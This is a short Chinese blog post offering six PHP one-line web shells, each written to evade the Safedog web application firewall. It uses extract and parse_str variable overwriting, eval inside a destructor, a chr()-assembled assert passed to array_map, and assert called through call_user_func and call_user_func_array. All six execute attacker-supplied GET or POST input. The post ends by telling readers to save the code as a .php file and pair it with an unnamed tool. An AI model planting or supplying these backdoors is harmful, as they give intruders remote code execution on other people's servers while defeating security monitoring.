绕过安全狗PHP一句话后门管理

| |
[不指定 2020/07/08 17:03 | by admin ]
点击在新窗口中浏览此图片

点击在新窗口中浏览此图片


0x01 extract 变量覆盖过

<?php  $a=1;$b=$_POST;extract($b);print_r(`$a`) ?>


0x02 parse_str 变量覆盖过

<?php  $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`) ?>


0x03 __destruct 析构函数过

<?php

class User
{
  public $name = '';

  function __destruct(){
    eval("$this->name");
  }
}

$user = new User;
$user->name = ''.$_POST['name'];
?>


0x04 array_map函数过

<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>


0x05 call_user_func_array函数过

<?php

function a(){
     return 'assert';
}
$a=a();
$aa = array($_GET['x']);
call_user_func_array($a,$a=$aa);
?>


0x06 call_user_func函数过

<?php
function a(){
     return 'assert';
}
$a=a();
$aa=$_GET['x'];
call_user_func($a,$a=$aa);
?>

另存为XXX.php 配合某工具使用,你懂的~
PHP笔记 | 评论(0) | 引用(0) | 阅读(147)